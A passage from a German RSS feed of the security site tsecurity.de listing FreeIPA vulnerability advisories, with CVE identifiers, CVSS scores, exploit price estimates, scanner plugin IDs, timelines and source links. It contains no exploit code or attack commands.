href="https://www.first.org/cvss/specification-document#i2">≈5.5</a><br><span>VulDB Temp Score</span>: <a href="https://www.first.org/cvss/specification-document#i3">≈5.5</a><br><span>VulDB Vector</span>: <a href="https://www.first.org/cvss/specification-document#i6">CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:X/RL:X/RC:X</a><br><span>VulDB Zuverlässigkeit</span>: Low<br><h2>CVSSv2</h2><span>VulDB Base Score</span>: <a href="https://www.first.org/cvss/v2/guide#i2.1">≈4.1 (CVSS2#AV:A/AC:M/Au:S/C:P/I:P/A:P)</a><br><span>VulDB Temp Score</span>: <a href="https://www.first.org/cvss/v2/guide#i2.2">≈4.1 (CVSS2#E:ND/RL:ND/RC:ND)</a><br><span>VulDB Zuverlässigkeit</span>: Low<br><br><h2>CPE</h2><ul><li><a href="https://web.nvd.nist.gov/view/vuln/search-results?cpe=cpe%3A%2Fa%3Afreeipa%3Afreeipa%3A4.x&amp;page_num=0&amp;cid=3">cpe:/a:freeipa:freeipa:4.x</a></li></ul><h2>Exploiting</h2><span>Klasse</span>: Erweiterte Rechte / Lockout (<a href="https://cwe.mitre.org/data/definitions/269.html">CWE-269</a>)<br><span>Lokal</span>: Ja<br><span>Remote</span>: Nein<br><br><span>Verfügbarkeit</span>: Nein<br><br><span>Preisentwicklung</span>: gleichbleibend<br><span>Aktuelle Preisschätzung</span>: <span>$0-$5k (0-day) / $0-$5k (Heute)</span><br><br><h2>Gegenmassnahmen</h2><span>Empfehlung</span>: keine Massnahme bekannt<br><span>0-Day Time</span>: 0 Tage seit gefunden<br><h2>Timeline</h2><span>12.07.2017</span>  <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11191">CVE zugewiesen</a><br><span>28.09.2017</span>  Advisory veröffentlicht<br><span>28.09.2017</span>  <a href="https://vuldb.com///vuldb.com/?id.107196">VulDB Eintrag erstellt</a><br><span>28.09.2017</span>  <a href="https://vuldb.com///vuldb.com/?id.107196">VulDB letzte Aktualisierung</a><br><h2>Quellen</h2><br><span>CVE</span>: CVE-2017-11191 <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11191">(mitre.org)</a> <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-11191">(nvd.nist.org)</a> <a href="https://www.cvedetails.com/cve/CVE-2017-11191/">(cvedetails.com)</a><br><h2>Eintrag</h2><span>Erstellt</span>: 28.09.2017<br><span>Eintrag</span>: 66.8% komplett<br>]]></content:encoded>
</item>
<item>
<title><![CDATA[FreeIPA Non-Printable Characters unbekannte Schwachstelle [CVE-2015-5179]]]></title>
<description><![CDATA[In FreeIPA - eine genaue Versionsangabe ist nicht möglich - wurde eine kritische Schwachstelle gefunden. Mittels dem Manipulieren durch Non-Printable Characters kann eine unbekannte Schwachstelle ausgenutzt werden. Die genauen Auswirkungen eines erfolgreichen Angriffs sind bisher nicht bekannt. C...]]></description>
<link>https://tsecurity.de/de/207111/sicherheitsluecken/freeipa-non-printable-characters-unbekannte-schwachstelle-cve-2015-5179/</link>
<guid isPermaLink="true">https://tsecurity.de/de/207111/sicherheitsluecken/freeipa-non-printable-characters-unbekannte-schwachstelle-cve-2015-5179/</guid>
<pubDate>Wed, 20 Sep 2017 20:34:53 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In FreeIPA - eine genaue Versionsangabe ist nicht möglich - wurde eine kritische Schwachstelle gefunden. Mittels dem Manipulieren durch <em>Non-Printable Characters</em> kann eine unbekannte Schwachstelle ausgenutzt werden. Die genauen Auswirkungen eines erfolgreichen Angriffs sind bisher nicht bekannt. CVE fasst zusammen:<br></p><blockquote lang="en">FreeIPA might display user data improperly via vectors involving non-printable characters.</blockquote><p>Die Schwachstelle wurde am 20.09.2017 als <em>Bug 1252567</em> in Form eines Bug Reports (Bugzilla) an die Öffentlichkeit getragen. Bereitgestellt wird das Advisory unter <a href="https://bugzilla.redhat.com/show_bug.cgi?id=1252567">bugzilla.redhat.com</a>. Eine eindeutige Identifikation der Schwachstelle wird seit dem 01.07.2015 mit <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5179">CVE-2015-5179</a> vorgenommen. Nicht vorhanden sind sowohl technische Details als auch ein Exploit zur Schwachstelle. Als Preis für einen Exploit ist zur Zeit ungefähr mit USD $0-$5k zu rechnen (<a href="https://vuldb.com/?doc.exploitprices">Preisberechnung vom 09/20/2017</a>). </p><p></p><p>Es sind keine Informationen bezüglich Gegenmassnahmen bekannt. Der Einsatz eines alternativen Produkts bietet sich im Zweifelsfall an.</p><p></p><h2>CPE</h2><ul><li><a href="https://web.nvd.nist.gov/view/vuln/search-results?cpe=cpe%3A%2Fa%3Afreeipa%3Afreeipa&amp;page_num=0&amp;cid=3">cpe:/a:freeipa:freeipa</a></li></ul><h2>Exploiting</h2><span>Klasse</span>: Unbekannt<br><span>Lokal</span>: Ja<br><span>Remote</span>: Nein<br><br><span>Verfügbarkeit</span>: Nein<br><br><span>Preisentwicklung</span>: gleichbleibend<br><span>Aktuelle Preisschätzung</span>: <span>$0-$5k (0-day) / $0-$5k (Heute)</span><br><br><h2>Gegenmassnahmen</h2><span>Empfehlung</span>: keine Massnahme bekannt<br><span>0-Day Time</span>: 0 Tage seit gefunden<br><h2>Timeline</h2><span>01.07.2015</span>  <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5179">CVE zugewiesen</a><br><span>20.09.2017</span>  <a href="https://bugzilla.redhat.com/show_bug.cgi?id=1252567">Advisory veröffentlicht</a><br><span>20.09.2017</span>  <a href="https://vuldb.com///vuldb.com/?id.106870">VulDB Eintrag erstellt</a><br><span>20.09.2017</span>  <a href="https://vuldb.com///vuldb.com/?id.106870">VulDB letzte Aktualisierung</a><br><h2>Quellen</h2><span>Advisory</span>: <a href="https://bugzilla.redhat.com/show_bug.cgi?id=1252567">Bug 1252567</a><br><br><span>CVE</span>: CVE-2015-5179 <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5179">(mitre.org)</a> <a href="https://nvd.nist.gov/vuln/detail/CVE-2015-5179">(nvd.nist.org)</a> <a href="https://www.cvedetails.com/cve/CVE-2015-5179/">(cvedetails.com)</a><br><h2>Eintrag</h2><span>Erstellt</span>: 20.09.2017<br><span>Eintrag</span>: 64% komplett<br>]]></content:encoded>
</item>
<item>
<title><![CDATA[FreeIPA Default Password Policy Lockout Denial of Service]]></title>
<description><![CDATA[In FreeIPA - eine genaue Versionsangabe ist nicht möglich - wurde eine problematische Schwachstelle gefunden. Dabei geht es um eine unbekannte Funktion der Komponente Default Password Policy. Durch Beeinflussen mit einer unbekannten Eingabe kann eine Denial of Service-Schwachstelle (Lockout) ausg...]]></description>
<link>https://tsecurity.de/de/198148/sicherheitsluecken/freeipa-default-password-policy-lockout-denial-of-service/</link>
<guid isPermaLink="true">https://tsecurity.de/de/198148/sicherheitsluecken/freeipa-default-password-policy-lockout-denial-of-service/</guid>
<pubDate>Tue, 29 Aug 2017 07:36:27 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In FreeIPA - eine genaue Versionsangabe ist nicht möglich - wurde eine problematische Schwachstelle gefunden. Dabei geht es um eine unbekannte Funktion der Komponente <em>Default Password Policy</em>. Durch Beeinflussen mit einer unbekannten Eingabe kann eine Denial of Service-Schwachstelle (Lockout) ausgenutzt werden. CWE definiert das Problem als <a href="https://cwe.mitre.org/data/definitions/404.html">CWE-404</a>. Das hat Auswirkungen auf  die Verfügbarkeit. </p><p>Die Schwachstelle wurde am 28.08.2017 durch Petr Spacek von Red Hat (oss-sec) an die Öffentlichkeit getragen. Bereitgestellt wird das Advisory unter <a href="http://www.openwall.com/lists/oss-security/2017/01/02/5">openwall.com</a>. Eine eindeutige Identifikation der Schwachstelle wird seit dem 23.08.2016 mit <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7030">CVE-2016-7030</a> vorgenommen. Sie ist leicht auszunutzen. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Um eine Ausnutzung durchzusetzen, muss keine spezifische Authentisierung umgesetzt werden. Es sind weder technische Details noch ein Exploit zur Schwachstelle bekannt. Es muss davon ausgegangen werden, dass ein Exploit zur Zeit etwa USD $0-$5k kostet (<a href="https://vuldb.com/?doc.exploitprices">Preisberechnung vom 08/29/2017</a>). </p><p>Für den Vulnerability Scanner Nessus wurde ein Plugin mit der ID <a href="https://www.tenable.com/plugins/index.php?view=single&amp;id=96182">96182</a> (CentOS 7 : ipa (CESA-2017:0001)) herausgegeben, womit die Existenz der Schwachstelle geprüft werden kann. Es wird der Family <em>CentOS Local Security Checks</em> zugeordnet. </p><p>Es sind keine Informationen bezüglich Gegenmassnahmen bekannt. Der Einsatz eines alternativen Produkts bietet sich im Zweifelsfall an.</p><p> Mitunter wird der Fehler auch in der Verwundbarkeitsdatenbank von SecurityFocus (<a href="http://www.securityfocus.com/bid/94934">BID 94934</a>) dokumentiert.</p><h2>CVSSv3</h2><span>VulDB Base Score</span>: <a href="https://www.first.org/cvss/specification-document#i2">5.3</a><br><span>VulDB Temp Score</span>: <a href="https://www.first.org/cvss/specification-document#i3">5.3</a><br><span>VulDB Vector</span>: <a href="https://www.first.org/cvss/specification-document#i6">CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:X/RL:X/RC:X</a><br><span>VulDB Zuverlässigkeit</span>: High<br><h2>CVSSv2</h2><span>VulDB Base Score</span>: <a href="https://www.first.org/cvss/v2/guide#i2.1">5.0 (CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P)</a><br><span>VulDB Temp Score</span>: <a href="https://www.first.org/cvss/v2/guide#i2.2">5.0 (CVSS2#E:ND/RL:ND/RC:ND)</a><br><span>VulDB Zuverlässigkeit</span>: High<br><br><h2>CPE</h2><ul><li><a href="https://web.nvd.nist.gov/view/vuln/search-results?cpe=cpe%3A%2Fa%3Afreeipa%3Afreeipa&amp;page_num=0&amp;cid=3">cpe:/a:freeipa:freeipa</a></li></ul><h2>Exploiting</h2><span>Klasse</span>: Denial of Service / Lockout (<a href="https://cwe.mitre.org/data/definitions/404.html">CWE-404</a>)<br><span>Lokal</span>: Nein<br><span>Remote</span>: Ja<br><br><span>Verfügbarkeit</span>: Nein<br><br><span>Preisentwicklung</span>: gleichbleibend<br><span>Aktuelle Preisschätzung</span>: <span>$0-$5k (0-day) / $0-$5k (Heute)</span><br><br><span>Nessus ID</span>: <a href="https://www.tenable.com/plugins/index.php?view=single&amp;id=96182">96182</a><br><span>Nessus Name</span>: CentOS 7 : ipa (CESA-2017:0001)<br><span>Nessus File</span>: centos_RHSA-2017-0001.nasl<br><span>Nessus Family</span>: CentOS Local Security Checks<br><br><span>OpenVAS ID</span>: 881932<br><span>OpenVAS Name</span>: CentOS Update for ipa-admintools CESA-2017:0001 centos7<br><span>OpenVAS File</span>: gb_CESA-2017_0001_ipa-admintools_centos7.nasl<br><span>OpenVAS Family</span>: CentOS Local Security Checks<br><br><h2>Gegenmassnahmen</h2><span>Empfehlung</span>: keine Massnahme bekannt<br><span>0-Day Time</span>: 0 Tage seit gefunden<br><h2>Timeline</h2><span>23.08.2016</span>  <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7030">CVE zugewiesen</a><br><span>15.12.2016</span>  <a href="http://www.securityfocus.com/bid/94934">SecurityFocus Eintrag zugewiesen</a><br><span>28.08.2017</span>  <a href="http://www.openwall.com/lists/oss-security/2017/01/02/5">Advisory veröffentlicht</a><br><span>29.08.2017</span>  <a href="https://vuldb.com///vuldb.com/?id.105808">VulDB Eintrag erstellt</a><br><span>29.08.2017</span>  <a href="https://vuldb.com///vuldb.com/?id.105808">VulDB letzte Aktualisierung</a><br><h2>Quellen</h2><span>Advisory</span>: <a href="http://www.openwall.com/lists/oss-security/2017/01/02/5">openwall.com</a><br><span>Person</span>: Petr Spacek<br><span>Firma</span>: Red Hat<br><span>Bestätigung</span>: <a href="https://bugzilla.redhat.com/show_bug.cgi?id=1370493">bugzilla.redhat.com</a><br><br><span>CVE</span>: CVE-2016-7030 <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7030">(mitre.org)</a> <a href="https://nvd.nist.gov/vuln/detail/CVE-2016-7030">(nvd.nist.org)</a> <a href="https://www.cvedetails.com/cve/CVE-2016-7030/">(cvedetails.com)</a><br><br><span>SecurityFocus</span>: <a href="http://www.securityfocus.com/bid/94934">94934 - FreeIPA CVE-2016-7030 Denial of Service Vulnerability</a><br><br><h2>Eintrag</h2><span>Erstellt</span>: 29.08.2017<br><span>Eintrag</span>: 76.4% komplett<br>]]></content:encoded>
</item>
<item>
<title><![CDATA[FreeIPA 2.213 Session Hijacking]]></title>
<description><![CDATA[FreeIPA version 2.213 suffers from a session hijacking vulnerability.]]></description>
<link>https://tsecurity.de/de/188425/poc/freeipa-2213-session-hijacking/</link>
<guid isPermaLink="true">https://tsecurity.de/de/188425/poc/freeipa-2213-session-hijacking/</guid>
<pubDate>Tue, 01 Aug 2017 06:49:46 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FreeIPA version 2.213 suffers from a session hijacking vulnerability.]]></content:encoded>
</item>
<item>
<title><![CDATA[FreeIPA 4.4.0 SAN Name Information Disclosure]]></title>
<description><![CDATA[Es wurde eine problematische Schwachstelle in FreeIPA 4.4.0 gefunden. Es betrifft eine unbekannte Funktion der Komponente SAN Name Handler. Mittels dem Manipulieren mit einer unbekannten Eingabe kann eine Information Disclosure-Schwachstelle ausgenutzt werden. Im Rahmen von CWE wurde eine Klassif...]]></description>
<link>https://tsecurity.de/de/176147/sicherheitsluecken/freeipa-440-san-name-information-disclosure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/176147/sicherheitsluecken/freeipa-440-san-name-information-disclosure/</guid>
<pubDate>Wed, 28 Jun 2017 06:04:22 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Es wurde eine problematische Schwachstelle in FreeIPA 4.4.0 gefunden. Es betrifft eine unbekannte Funktion der Komponente <em>SAN Name Handler</em>. Mittels dem Manipulieren mit einer unbekannten Eingabe kann eine Information Disclosure-Schwachstelle ausgenutzt werden. Im Rahmen von CWE wurde eine Klassifizierung als <a href="https://cwe.mitre.org/data/definitions/200.html">CWE-200</a> vorgenommen. Auswirken tut sich dies auf  die Vertraulichkeit. </p><p>Die Schwachstelle wurde am 27.06.2017 als <em>Bug 1184610</em> in Form eines Bug Reports (Bugzilla) publiziert. Das Advisory kann von <a href="https://bugzilla.redhat.com/attachment.cgi?id=1184610">bugzilla.redhat.com</a> heruntergeladen werden. Die Identifikation der Schwachstelle wird seit dem 10.06.2016 mit <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5414">CVE-2016-5414</a> vorgenommen. Der Angriff kann über das Netzwerk erfolgen. Technische Details sind nicht bekannt und ein Exploit zur Schwachstelle ist ebenfalls nicht vorhanden. Die Beschaffenheit der Schwachstelle lässt vermuten, dass ein Exploit momentan zu etwa USD $0-$5k gehandelt werden wird (<a href="https://vuldb.com/?doc.exploitprices">Preisberechnung vom 06/28/2017</a>). </p><p></p><p>Es sind keine Informationen bezüglich Gegenmassnahmen bekannt. Der Einsatz eines alternativen Produkts bietet sich im Zweifelsfall an.</p><p></p><h2>CVSSv3</h2><span>VulDB Base Score</span>: <a href="https://www.first.org/cvss/specification-document#i2">≈4.3</a><br><span>VulDB Temp Score</span>: <a href="https://www.first.org/cvss/specification-document#i3">≈4.3</a><br><span>VulDB Vector</span>: <a href="https://www.first.org/cvss/specification-document#i6">CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:X/RL:X/RC:X</a><br><span>VulDB Zuverlässigkeit</span>: Medium<br><h2>CVSSv2</h2><span>VulDB Base Score</span>: <a href="https://www.first.org/cvss/v2/guide#i2.1">≈3.5 (CVSS2#AV:N/AC:M/Au:S/C:P/I:N/A:N)</a><br><span>VulDB Temp Score</span>: <a href="https://www.first.org/cvss/v2/guide#i2.2">≈3.5 (CVSS2#E:ND/RL:ND/RC:ND)</a><br><span>VulDB Zuverlässigkeit</span>: Medium<br><br><h2>CPE</h2><ul><li><a href="https://web.nvd.nist.gov/view/vuln/search-results?cpe=cpe%3A%2Fa%3Afreeipa%3Afreeipa%3A4.4.0&amp;page_num=0&amp;cid=3">cpe:/a:freeipa:freeipa:4.4.0</a></li></ul><h2>Exploiting</h2><span>Klasse</span>: Information Disclosure (<a href="https://cwe.mitre.org/data/definitions/200.html">CWE-200</a>)<br><span>Lokal</span>: Nein<br><span>Remote</span>: Ja<br><br><span>Verfügbarkeit</span>: Nein<br><br><span>Preisentwicklung</span>: gleichbleibend<br><span>Aktuelle Preisschätzung</span>: <span>$0-$5k (0-day) / $0-$5k (Heute)</span><br><br><h2>Gegenmassnahmen</h2><span>Empfehlung</span>: keine Massnahme bekannt<br><span>0-Day Time</span>: 0 Tage seit gefunden<br><h2>Timeline</h2><span>10.06.2016</span>  <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5414">CVE zugewiesen</a><br><span>27.06.2017</span>  <a href="https://bugzilla.redhat.com/attachment.cgi?id=1184610">Advisory veröffentlicht</a><br><span>28.06.2017</span>  <a href="https://vuldb.com///vuldb.com/?id.102855">VulDB Eintrag erstellt</a><br><span>28.06.2017</span>  <a href="https://vuldb.com///vuldb.com/?id.102855">VulDB letzte Aktualisierung</a><br><h2>Quellen</h2><span>Advisory</span>: <a href="https://bugzilla.redhat.com/attachment.cgi?id=1184610">Bug 1184610</a><br><br><span>CVE</span>: CVE-2016-5414 <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5414">(mitre.org)</a> <a href="https://nvd.nist.gov/vuln/detail/CVE-2016-5414">(nvd.nist.org)</a> <a href="https://www.cvedetails.com/cve/CVE-2016-5414/">(cvedetails.com)</a><br><h2>Eintrag</h2><span>Erstellt</span>: 28.06.2017<br><span>Eintrag</span>: 69.2% komplett<br>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vuln: FreeIPA CVE-2017-2590 Multiple Security Bypass Vulnerabilities]]></title>
<description><![CDATA[FreeIPA CVE-2017-2590 Multiple Security Bypass Vulnerabilities]]></description>
<link>https://tsecurity.de/de/131676/sicherheitsluecken/vuln-freeipa-cve-2017-2590-multiple-security-bypass-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/131676/sicherheitsluecken/vuln-freeipa-cve-2017-2590-multiple-security-bypass-vulnerabilities/</guid>
<pubDate>Mon, 06 Mar 2017 12:05:42 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FreeIPA CVE-2017-2590 Multiple Security Bypass Vulnerabilities]]></content:encoded>
</item>
<item>
<title><![CDATA[FreeIPA: Eine Schwachstelle ermöglicht die Manipulation von Zertifikaten und dadurch einen Denial-of-Service-Angriff]]></title>
<description><![CDATA[CB-K17/0349: FreeIPA: Eine Schwachstelle ermöglicht die Manipulation von Zertifikaten und dadurch einen Denial-of-Service-Angriff]]></description>
<link>https://tsecurity.de/de/129818/sicherheitsluecken/freeipa-eine-schwachstelle-ermoeglicht-die-manipulation-von-zertifikaten-und-dadurch-einen-denial-of-service-angriff/</link>
<guid isPermaLink="true">https://tsecurity.de/de/129818/sicherheitsluecken/freeipa-eine-schwachstelle-ermoeglicht-die-manipulation-von-zertifikaten-und-dadurch-einen-denial-of-service-angriff/</guid>
<pubDate>Wed, 01 Mar 2017 09:36:30 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[CB-K17/0349: FreeIPA: Eine Schwachstelle ermöglicht die Manipulation von Zertifikaten und dadurch einen Denial-of-Service-Angriff]]></content:encoded>
</item>
<item>
<title><![CDATA[Vuln: FreeIPA CVE-2016-9575  Insecure File Permissions Vulnerability]]></title>
<description><![CDATA[FreeIPA CVE-2016-9575  Insecure File Permissions Vulnerability]]></description>
<link>https://tsecurity.de/de/104847/sicherheitsluecken/vuln-freeipa-cve-2016-9575-insecure-file-permissions-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/104847/sicherheitsluecken/vuln-freeipa-cve-2016-9575-insecure-file-permissions-vulnerability/</guid>
<pubDate>Thu, 22 Dec 2016 22:15:59 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FreeIPA CVE-2016-9575  Insecure File Permissions Vulnerability]]></content:encoded>
</item>
<item>
<title><![CDATA[Vuln: FreeIPA CVE-2016-9575  Insecure File Permissions Vulnerability]]></title>
<description><![CDATA[FreeIPA CVE-2016-9575  Insecure File Permissions Vulnerability]]></description>
<link>https://tsecurity.de/de/104847/sicherheitsluecken/vuln-freeipa-cve-2016-9575-insecure-file-permissions-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/104847/sicherheitsluecken/vuln-freeipa-cve-2016-9575-insecure-file-permissions-vulnerability/</guid>
<pubDate>Thu, 22 Dec 2016 22:15:59 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FreeIPA CVE-2016-9575  Insecure File Permissions Vulnerability]]></content:encoded>
</item>
<item>
<title><![CDATA[Vuln: FreeIPA CVE-2016-7030 Denial of Service Vulnerability]]></title>
<description><![CDATA[FreeIPA CVE-2016-7030 Denial of Service Vulnerability]]></description>
<link>https://tsecurity.de/de/102485/sicherheitsluecken/vuln-freeipa-cve-2016-7030-denial-of-service-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/102485/sicherheitsluecken/vuln-freeipa-cve-2016-7030-denial-of-service-vulnerability/</guid>
<pubDate>Thu, 15 Dec 2016 22:00:46 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FreeIPA CVE-2016-7030 Denial of Service Vulnerability]]></content:encoded>
</item>
<item>
<title><![CDATA[Vuln: FreeIPA CVE-2016-7030 Denial of Service Vulnerability]]></title>
<description><![CDATA[FreeIPA CVE-2016-7030 Denial of Service Vulnerability]]></description>
<link>https://tsecurity.de/de/102485/sicherheitsluecken/vuln-freeipa-cve-2016-7030-denial-of-service-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/102485/sicherheitsluecken/vuln-freeipa-cve-2016-7030-denial-of-service-vulnerability/</guid>
<pubDate>Thu, 15 Dec 2016 22:00:46 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FreeIPA CVE-2016-7030 Denial of Service Vulnerability]]></content:encoded>
</item>
<item>
<title><![CDATA[FreeIPA cert_revoke Certificate Denial of Service]]></title>
<description><![CDATA[Es wurde eine problematische Schwachstelle in FreeIPA - die betroffene Version ist nicht klar definiert - gefunden. Dabei betrifft es eine unbekannte Funktion der Komponente cert_revoke. Durch das Beeinflussen mit einer unbekannten Eingabe kann eine Denial of Service-Schwachstelle (Certificate) a...]]></description>
<link>https://tsecurity.de/de/70736/sicherheitsluecken/freeipa-certrevoke-certificate-denial-of-service/</link>
<guid isPermaLink="true">https://tsecurity.de/de/70736/sicherheitsluecken/freeipa-certrevoke-certificate-denial-of-service/</guid>
<pubDate>Thu, 08 Sep 2016 20:45:56 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Es wurde eine problematische Schwachstelle in FreeIPA - die betroffene Version ist nicht klar definiert - gefunden. Dabei betrifft es eine unbekannte Funktion der Komponente <em>cert_revoke</em>. Durch das Beeinflussen mit einer unbekannten Eingabe kann eine Denial of Service-Schwachstelle (Certificate) ausgenutzt werden. Dies hat Einfluss auf  die Verfügbarkeit. </p><p>Die Schwachstelle wurde am 07.09.2016 publiziert. Die Identifikation der Schwachstelle wird mit <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5404">CVE-2016-5404</a> vorgenommen. Der Angriff kann über das Netzwerk erfolgen. Um eine Ausnutzung durchzusetzen, muss eine einfache Authentisierung umgesetzt werden. Technische Details oder ein Exploit zur Schwachstelle sind nicht verfügbar. </p><p></p><p>Es sind keine Informationen bezüglich Gegenmassnahmen bekannt. Der Einsatz eines alternativen Produkts bietet sich im Zweifelsfall an.</p><p></p><h2>CVSSv3</h2><span>Base Score</span>: 4.3 <a href="https://www.first.org/cvss/specification-document#i2">[?]</a><br><span>Temp Score</span>: 4.3 <a href="https://www.first.org/cvss/specification-document#i3">[?]</a><br><span>Vector</span>: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L/E:X/RL:X/RC:X <a href="https://www.first.org/cvss/specification-document#i6">[?]</a><br><span>Zuverlässigkeit</span>: Medium<br><h2>CVSSv2</h2><span>Base Score</span>: 3.5 (CVSS2#AV:N/AC:M/Au:S/C:N/I:N/A:P) <a href="https://www.first.org/cvss/v2/guide#i2.1">[?]</a><br><span>Temp Score</span>: 3.5 (CVSS2#E:ND/RL:ND/RC:ND) <a href="https://www.first.org/cvss/v2/guide#i2.2">[?]</a><br><span>Zuverlässigkeit</span>: Medium<br><h2>CPE</h2><ul><li><a href="https://web.nvd.nist.gov/view/vuln/search-results?cpe=cpe%3A%2Fa%3Afreeipa%3Afreeipa&amp;page_num=0&amp;cid=3">cpe:/a:freeipa:freeipa</a></li></ul><h2>Exploiting</h2><span>Klasse</span>: Denial of Service<br><span>Lokal</span>: Nein<br><span>Remote</span>: Ja<br><br><span>Verfügbarkeit</span>: Nein<br><br><span>Aktuelle Preisschätzung</span>: <span>$0-$1k (0-day) / $0-$1k (Heute)</span><br><h2>Gegenmassnahmen</h2><span>Empfehlung</span>: keine Massnahme bekannt<br><span>0-Day Time</span>: 0 Tage seit gefunden<br><h2>Timeline</h2><span>07.09.2016</span>  Advisory veröffentlicht<br><span>08.09.2016</span>  <a href="https://vuldb.com///vuldb.com/?id.91353">VulDB Eintrag erstellt</a><br><span>08.09.2016</span>  <a href="https://vuldb.com///vuldb.com/?id.91353">VulDB letzte Aktualisierung</a><br><h2>Quellen</h2><br><span>CVE</span>: CVE-2016-5404 <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5404">(mitre.org)</a> <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5404">(nvd.nist.org)</a> <a href="http://www.cvedetails.com/cve/CVE-2016-5404/">(cvedetails.com)</a><br><h2>Eintrag</h2><span>Erstellt</span>: 08.09.2016<br><span>Eintrag</span>: 69.7% komplett<br>]]></content:encoded>
</item>
<item>
<title><![CDATA[FreeIPA cert_revoke Certificate Denial of Service]]></title>
<description><![CDATA[Es wurde eine problematische Schwachstelle in FreeIPA - die betroffene Version ist nicht klar definiert - gefunden. Dabei betrifft es eine unbekannte Funktion der Komponente cert_revoke. Durch das Beeinflussen mit einer unbekannten Eingabe kann eine Denial of Service-Schwachstelle (Certificate) a...]]></description>
<link>https://tsecurity.de/de/70736/sicherheitsluecken/freeipa-certrevoke-certificate-denial-of-service/</link>
<guid isPermaLink="true">https://tsecurity.de/de/70736/sicherheitsluecken/freeipa-certrevoke-certificate-denial-of-service/</guid>
<pubDate>Thu, 08 Sep 2016 20:45:56 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Es wurde eine problematische Schwachstelle in FreeIPA - die betroffene Version ist nicht klar definiert - gefunden. Dabei betrifft es eine unbekannte Funktion der Komponente <em>cert_revoke</em>. Durch das Beeinflussen mit einer unbekannten Eingabe kann eine Denial of Service-Schwachstelle (Certificate) ausgenutzt werden. Dies hat Einfluss auf  die Verfügbarkeit. </p><p>Die Schwachstelle wurde am 07.09.2016 publiziert. Die Identifikation der Schwachstelle wird mit <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5404">CVE-2016-5404</a> vorgenommen. Der Angriff kann über das Netzwerk erfolgen. Um eine Ausnutzung durchzusetzen, muss eine einfache Authentisierung umgesetzt werden. Technische Details oder ein Exploit zur Schwachstelle sind nicht verfügbar. </p><p></p><p>Es sind keine Informationen bezüglich Gegenmassnahmen bekannt. Der Einsatz eines alternativen Produkts bietet sich im Zweifelsfall an.</p><p></p><h2>CVSSv3</h2><span>Base Score</span>: 4.3 <a href="https://www.first.org/cvss/specification-document#i2">[?]</a><br><span>Temp Score</span>: 4.3 <a href="https://www.first.org/cvss/specification-document#i3">[?]</a><br><span>Vector</span>: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L/E:X/RL:X/RC:X <a href="https://www.first.org/cvss/specification-document#i6">[?]</a><br><span>Zuverlässigkeit</span>: Medium<br><h2>CVSSv2</h2><span>Base Score</span>: 3.5 (CVSS2#AV:N/AC:M/Au:S/C:N/I:N/A:P) <a href="https://www.first.org/cvss/v2/guide#i2.1">[?]</a><br><span>Temp Score</span>: 3.5 (CVSS2#E:ND/RL:ND/RC:ND) <a href="https://www.first.org/cvss/v2/guide#i2.2">[?]</a><br><span>Zuverlässigkeit</span>: 